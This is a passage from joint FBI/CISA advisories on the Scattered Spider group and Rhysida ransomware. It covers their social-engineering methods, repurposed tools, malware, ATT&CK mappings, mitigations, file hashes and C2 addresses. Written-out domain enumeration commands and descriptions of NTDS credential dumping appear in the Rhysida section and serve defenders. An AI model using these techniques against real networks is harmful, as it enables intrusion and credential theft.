  • Posed as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees and gain access to the network [T1598],[T1656].
  • Posed as company IT and/or helpdesk staff to direct employees to run commercial remote access tools enabling initial access [T1204],[T1219],[T1566].
  • Posed as IT staff to convince employees to share their one-time password (OTP), an MFA authentication code.
  • Sent repeated MFA notification prompts leading to employees pressing the “Accept” button (also known as MFA fatigue) [T1621].[5]
  • Convinced cellular carriers to transfer control of a targeted user’s phone number to a SIM card they controlled, gaining control over the phone and access to MFA prompts.
  • Monetized access to victim networks in numerous ways including extortion enabled by ransomware and data theft [T1657].

After gaining access to networks, FBI observed Scattered Spider threat actors using publicly available, legitimate remote access tunneling tools. Table 1 details a list of legitimate tools Scattered Spider, repurposed and used for their criminal activity. Note: The use of these legitimate tools alone is not indicative of criminal activity. Users should review the Scattered Spider indicators of compromise (IOCs) and TTPs discussed in this CSA to determine whether they have been compromised.

Table 1: Legitimate Tools Used by Scattered Spider

Tool

Intended Use

Fleetdeck.io

Enables remote monitoring and management of systems.

Level.io

Enables remote monitoring and management of systems.

Mimikatz [S0002]

Extracts credentials from a system.

Ngrok [S0508]

Enables remote access to a local web server by tunneling over the internet.

Pulseway

Enables remote monitoring and management of systems.

Screenconnect

Enables remote connections to network devices for management.

Splashtop

Enables remote connections to network devices for management.

Tactical.RMM

Enables remote monitoring and management of systems.

Tailscale

Provides virtual private networks (VPNs) to secure network communications.

Teamviewer

Enables remote connections to network devices for management.

In addition to using legitimate tools, Scattered Spider also uses malware as part of its TTPs. See Table 2 for some of the malware used by Scattered Spider.

Table 2: Malware Used by Scattered Spider

Malware

Use

AveMaria (also known as WarZone [S0670])

Enables remote access to a victim’s systems.

Raccoon Stealer

Steals information including login credentials [TA0006], browser history [T1217], cookies [T1539], and other data.

VIDAR Stealer

Steals information including login credentials, browser history, cookies, and other data.

Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.

Observably, Scattered Spider threat actors have exfiltrated data [TA0010] after gaining access and threatened to release it without deploying ransomware; this includes exfiltration to multiple sites including U.S.-based data centers and MEGA[.]NZ [T1567.002].

Recent Scattered Spider TTPs

New TTP - File Encryption

More recently, the FBI has identified Scattered Spider threat actors now encrypting victim files after exfiltration [T1486]. After exfiltrating and/or encrypting data, Scattered Spider threat actors communicate with victims via TOR, Tox, email, or encrypted applications.

Reconnaissance, Resource Development, and Initial Access

Scattered Spider intrusions often begin with broad phishing [T1566] and smishing [T1660] attempts against a target using victim-specific crafted domains, such as the domains listed in Table 3 [T1583.001].

Table 3: Domains Used by Scattered Spider Threat Actors

Domains

victimname-sso[.]com

victimname-servicedesk[.]com

victimname-okta[.]com

In most instances, Scattered Spider threat actors conduct SIM swapping attacks against users that respond to the phishing/smishing attempt. The threat actors then work to identify the personally identifiable information (PII) of the most valuable users that succumbed to the phishing/smishing, obtaining answers for those users’ security questions. After identifying usernames, passwords, PII [T1589], and conducting SIM swaps, the threat actors then use social engineering techniques [T1656] to convince IT help desk personnel to reset passwords and/or MFA tokens [T1078.002],[T1199],[T1566.004] to perform account takeovers against the users in single sign-on (SSO) environments.

Execution, Persistence, and Privilege Escalation

Scattered Spider threat actors then register their own MFA tokens [T1556.006],[T1606] after compromising a user’s account to establish persistence [TA0003]. Further, the threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking [T1484.002]. The threat actors are then able to sign into any account by using a matching SSO account attribute. At this stage, the Scattered Spider threat actors already control the identity provider and then can choose an arbitrary value for this account attribute. As a result, this activity allows the threat actors to perform privileged escalation [TA0004] and continue logging in even when passwords are changed [T1078]. Additionally, they leverage common endpoint detection and response (EDR) tools installed on the victim networks to take advantage of the tools’ remote-shell capabilities and executing of commands which elevates their access. They also deploy remote monitoring and management (RMM) tools [T1219] to then maintain persistence.

Discovery, Lateral Movement, and Exfiltration

Once persistence is established on a target network, Scattered Spider threat actors often perform discovery, specifically searching for SharePoint sites [T1213.002], credential storage documentation [T1552.001], VMware vCenter infrastructure [T1018], backups, and instructions for setting up/logging into Virtual Private Networks (VPN) [TA0007]. The threat actors enumerate the victim’s Active Directory (AD), perform discovery and exfiltration of victim’s code repositories [T1213.003], code-signing certificates [T1552.004], and source code [T1083],[TA0010]. Threat actors activate Amazon Web Services (AWS) Systems Manager Inventory [T1538] to discover targets for lateral movement [TA0007],[TA0008], then move to both preexisting [T1021.007] and actor-created [T1578.002] Amazon Elastic Compute Cloud (EC2) instances. In instances where the ultimate goal is data exfiltration, Scattered Spider threat actors use actor-installed extract, transform, and load (ETL) tools [T1648] to bring data from multiple data sources into a centralized database [T1074],[T1530]. According to trusted third parties, where more recent incidents are concerned, Scattered Spider threat actors may have deployed BlackCat/ALPHV ransomware onto victim networks—thereby encrypting VMware Elastic Sky X integrated (ESXi) servers [T1486].

To determine if their activities have been uncovered and maintain persistence, Scattered Spider threat actors often search the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails [T1114] or conversations regarding the threat actor’s intrusion and any security response. The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses. This is sometimes achieved by creating new identities in the environment [T1136] and is often upheld with fake social media profiles [T1585.001] to backstop newly created identities.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4 through 17 for all referenced threat actor tactics and techniques in this advisory.

Table 4: Reconnaissance

Technique Title

ID

Use

Gather Victim Identity Information

T1589

Scattered Spider threat actors gather usernames, passwords, and PII for targeted organizations.

Phishing for Information

T1598

Scattered Spider threat actors use phishing to obtain login credentials, gaining access to a victim’s network.

Table 5: Resource Development

Technique Title

ID

Use

Acquire Infrastructure: Domains

T1583.001

Scattered Spider threat actors create domains for use in phishing and smishing attempts against targeted organizations.

Establish Accounts: Social Media Accounts

T1585.001

Scattered Spider threat actors create fake social media profiles to backstop newly created user accounts in a targeted organization.

Table 6: Initial Access

Technique Title

ID

Use

Phishing

T1566

Scattered Spider threat actors use broad phishing attempts against a target to obtain information used to gain initial access.

Scattered Spider threat actors have posed as helpdesk personnel to direct employees to install commercial remote access tools.

Phishing (Mobile)

T1660

Scattered Spider threat actors send SMS messages, known as smishing, when targeting a victim.

Phishing: Spearphishing Voice

T1566.004

Scattered Spider threat actors use voice communications to convince IT help desk personnel to reset passwords and/or MFA tokens.

Trusted Relationship

T1199

Scattered Spider threat actors abuse trusted relationships of contracted IT help desks to gain access to targeted organizations.

Valid Accounts: Domain Accounts

T1078.002

Scattered Spider threat actors obtain access to valid domain accounts to gain initial access to a targeted organization.

Table 7: Execution

Technique Title

ID

Use

Serverless Execution

T1648

Scattered Spider threat actors use ETL tools to collect data in cloud environments.

User Execution

T1204

Scattered Spider threat actors impersonating helpdesk personnel direct employees to run commercial remote access tools thereby enabling access to the victim’s network.

Table 8: Persistence

Technique Title

ID

Use

Persistence

TA0003

Scattered Spider threat actors seek to maintain persistence on a targeted organization’s network.

Create Account

T1136

Scattered Spider threat actors create new user identities in the targeted organization.

Modify Authentication Process: Multi-Factor Authentication

T1556.006

Scattered Spider threat actors may modify MFA tokens to gain access to a victim’s network.

Valid Accounts

T1078

Scattered Spider threat actors abuse and control valid accounts to maintain network access even when passwords are changed.

Table 9: Privilege Escalation

Technique Title

ID

Use

Privilege Escalation

TA0004

Scattered Spider threat actors escalate account privileges when on a targeted organization’s network.

Domain Policy Modification: Domain Trust Modification

T1484.002

Scattered Spider threat actors add a federated identify provider to the victim’s SSO tenant and activate automatic account linking.

Table 10: Defense Evasion

Technique Title

ID

Use

Modify Cloud Compute Infrastructure: Create Cloud Instance

T1578.002

Scattered Spider threat actors will create cloud instances for use during lateral movement and data collection.

Impersonation

TA1656

Scattered Spider threat actors pose as company IT and/or helpdesk staff to gain access to victim’s networks.

Scattered Spider threat actors use social engineering to convince IT help desk personnel to reset passwords and/or MFA tokens.

Table 11: Credential Access

Technique Title

ID

Use

Credential Access

TA0006

Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain login credentials.

Forge Web Credentials

T1606

Scattered Spider threat actors may forge MFA tokens to gain access to a victim’s network.

Multi-Factor Authentication Request Generation

T1621

Scattered Spider sends repeated MFA notification prompts to lead employees to accept the prompt and gain access to the target network.

Unsecured Credentials: Credentials in Files

T1552.001

Scattered Spider threat actors search for insecurely stored credentials on victim’s systems.

Unsecured Credentials: Private Keys

T1552.004

Scattered Spider threat actors search for insecurely stored private keys on victim’s systems.

Table 12: Discovery

Technique Title

ID

Use

Discovery

TA0007

Upon gaining access to a targeted network, Scattered Spider threat actors seek out SharePoint sites, credential storage documentation, VMware vCenter, infrastructure backups and enumerate AD to identify useful information to support further operations.

Browser Information Discovery

T1217

Scattered Spider threat actors use tools (e.g., Raccoon Stealer) to obtain browser histories.

Cloud Service Dashboard

T1538

Scattered Spider threat actors leverage AWS Systems Manager Inventory to discover targets for lateral movement.

File and Directory Discovery

T1083

Scattered Spider threat actors search a compromised network to discover files and directories for further information or exploitation.

Remote System Discovery

T1018

Scattered Spider threat actors search for infrastructure, such as remote systems, to exploit.

Steal Web Session Cookie

T1539

Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain browser cookies.

Table 13: Lateral Movement

Technique Title

ID

Use

Lateral Movement

TA0008

Scattered Spider threat actors laterally move across a target network upon gaining access and establishing persistence.

Remote Services: Cloud Services

T1021.007

Scattered Spider threat actors use pre-existing cloud instances for lateral movement and data collection.

Table 14: Collection

Technique Title

ID

Use

Data from Information Repositories: Code Repositories

T1213.003

Scattered Spider threat actors search code repositories for data collection and exfiltration.

Data from Information Repositories: Sharepoint

T1213.002

Scattered Spider threat actors search SharePoint repositories for information.

Data Staged

T1074

Scattered Spider threat actors stage data from multiple data sources into a centralized database before exfiltration.

Email Collection

T1114

Scattered Spider threat actors search victim’s emails to determine if the victim has detected the intrusion and initiated any security response.

Data from Cloud Storage

T1530

Scattered Spider threat actors search data in cloud storage for collection and exfiltration.

Table 15: Command and Control

Technique Title

ID

Use

Remote Access Software

T1219

Impersonating helpdesk personnel, Scattered Spider threat actors direct employees to run commercial remote access tools thereby enabling access to and command and control of the victim’s network.

Scattered Spider threat actors leverage third-party software to facilitate lateral movement and maintain persistence on a target organization’s network.

Table 16: Exfiltration

Technique Title

ID

Use

Exfiltration

TA0010

Scattered Spider threat actors exfiltrate data from a target network to for data extortion.

Table 17: Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Scattered Spider threat actors recently began encrypting data on a target network and demanding a ransom for decryption.

Scattered Spider threat actors has been observed encrypting VMware ESXi servers.

Exfiltration Over Web Service: Exfiltration to Cloud Storage

T1567.002

Scattered Spider threat actors exfiltrate data to multiple sites including U.S.-based data centers and MEGA[.]NZ.

Financial Theft

T1657

Scattered Spider threat actors monetized access to victim networks in numerous ways including extortion-enabled ransomware and data theft.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actor activity and to reduce the risk of compromise by Scattered Spider threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
    • Using security software to detect instances of remote access software being loaded only in memory.
    • Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
    • Applying recommendations in the Guide to Securing Remote Access Software.
  • Implementing FIDO/WebAuthn authentication or Public Key Infrastructure (PKI)-based MFA. These MFA implementations are resistant to phishing and not suspectable to push bombing or SIM swap attacks, which are techniques known to be used by Scattered Spider actors. See CISA’s fact sheet Implementing Phishing-Resistant MFA for more information.
  • Strictly limit the use of Remote Desktop Protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies.
    • Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Disable unused ports and protocols [CPG 2.V].
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.
  • Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 4-17).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REPORTING

FBI and CISA are seeking any information that can be shared, to include a sample ransom note, communications with Scattered Spider group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, or CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870).

REFERENCES

[1] MITRE ATT&CK – Scattered Spider
[2] Trellix - Scattered Spider: The Modus Operandi
[3] Crowdstrike - Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
[4] Crowdstrike - SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security
[5] Malwarebytes - Ransomware group steps up, issues statement over MGM Resorts compromise

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.

VERSION HISTORY

November 16, 2023: Initial version.

November 14, 2023

#StopRansomware: Rhysida Ransomware | CISA

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.

FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

AA23-319A STIX XML (XML, 115.31 KB )
AA23-319A STIX JSON (JSON, 65.69 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity.

Overview

Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.

For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.

Initial Access

Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably due to organizations lacking MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privileges vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]

Living off the Land

Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.

Ipconfig [T1016], whoami [T1033], nltest [T1482], and several net commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.

  • net user [username] /domain [T1087.002]
  • net group “domain computers” /domain [T1018]
  • net group “domain admins” /domain [T1069.002]
  • net localgroup administrators [T1069.001]

Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat registry hive, which was created when the compromised user logged in to the system for the first time. This was considered anomalous due to the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about a file including its size, time and date stamps, permissions, and data content.

Leveraged Tools

Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.

Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.

Table 1: Tools Leveraged by Rhysida Actors

Name

Description

cmd.exe

The native command line prompt utility.

PowerShell.exe

A native command line tool used to start a Windows PowerShell session in a Command Prompt window.

PsExec.exe

A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution.

mstsc.exe

A native tool that establishes an RDP connection to a host.

PuTTY.exe

Rhysida actors have been observed creating Secure Shell (SSH) PuTTy connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTy to remotely connect to systems via SSH [T1021.004].

PortStarter

A back door script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1]

secretsdump

A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances.

ntdsutil.exe

A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the NTDS.dit database from the domain controller containing hashes for all Active Directory (AD) users.

Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets if any indication is found that the NTDS.dit file was compromised.

AnyDesk

A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.

wevtutil.exe

A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001].

PowerView

A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials.

Rhysida Ransomware Characteristics

Execution

In one investigation, Rhysida actors created two folders in the C: drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. The in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.

Table 2: Malicious Executables Affiliated with Rhysida Infections

File Name

Hash (SHA256)

Description

conhost.exe

6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010

A ransomware binary.

psexec.exe

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

A file used to execute a process on a remote or local host.

S_0.bat

1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597

A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003].

1.ps1

4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183

Identifies an extension block list of files to encrypt and not encrypt.

S_1.bat

97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4

A batch script that copies conhost.exe (the encryption binary) on an imported list of host names within the C:WindowsTemp directory of each system.

S_2.bat

918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1

Executes conhost.exe on compromised victim systems, which encrypts and appends the extension of .Rhysida across the environment.

Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].

Encryption

After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm [T1486]. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands [T1112] are not obfuscated, displayed as plain-text strings and executed via cmd.exe.

Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a .rhysida extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor allows arguments -d (select a directory) and -sr (file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.

Data Extortion

Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.

Figure 1: Rhysida Ransom Note
Figure 1: Rhysida Ransom Note

Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8]

INDICATORS OF COMPROMISE

On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]

Table 3: C2 IP Addresses Used for Rhysida Operations

C2 IP Address

5.39.222[.]67

5.255.99[.]59

51.77.102[.]106

108.62.118[.]136

108.62.141[.]161

146.70.104[.]249

156.96.62[.]58

157.154.194[.]6

Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org.

Table 4: Email Addresses Used to Support Rhysida Operations

Email Address

rhysidaeverywhere@onionmail[.]org

rhysidaofficial@onionmail[.]org

Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.

Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.

Table 5: Files Used to Support Rhysida Operations

File Name

Hash (SHA256)

Sock5.sh

48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57

PsExec64.exe

edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef

PsExec.exe

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

PsGetsid64.exe

201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa

PsGetsid.exe

a48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb

PsInfo64.exe

de73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7

PsInfo.exe

951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501

PsLoggedon64.exe

fdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea

PsLoggedon.exe

d689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef

PsService64.exe

554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d

PsService.exe

d3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c

Eula.txt

8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a

psfile64.exe

be922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21

psfile.exe

4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329

pskill64.exe

7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d

pskill.exe

5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42

pslist64.exe

d3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60

pslist.exe

ed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a

psloglist64.exe

5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636

psloglist.exe

dcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f

pspasswd64.exe

8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f

pspasswd.exe

6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801

psping64.exe

d1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285

psping.exe

355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140

psshutdown64.exe

4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400

psshutdown.exe

13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123

pssuspend64.exe

4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee

pssuspend.exe

95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd

PSTools.zip

a9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61

Pstools.chm

2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc

psversion.txt

8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4

psexesvc.exe

This artifact is created when a user establishes a connection using psexec. It is removed after the connection is terminated, which is why there is no hash available for this executable.

MITRE ATT&CK TACTICS AND TECHNIQUES

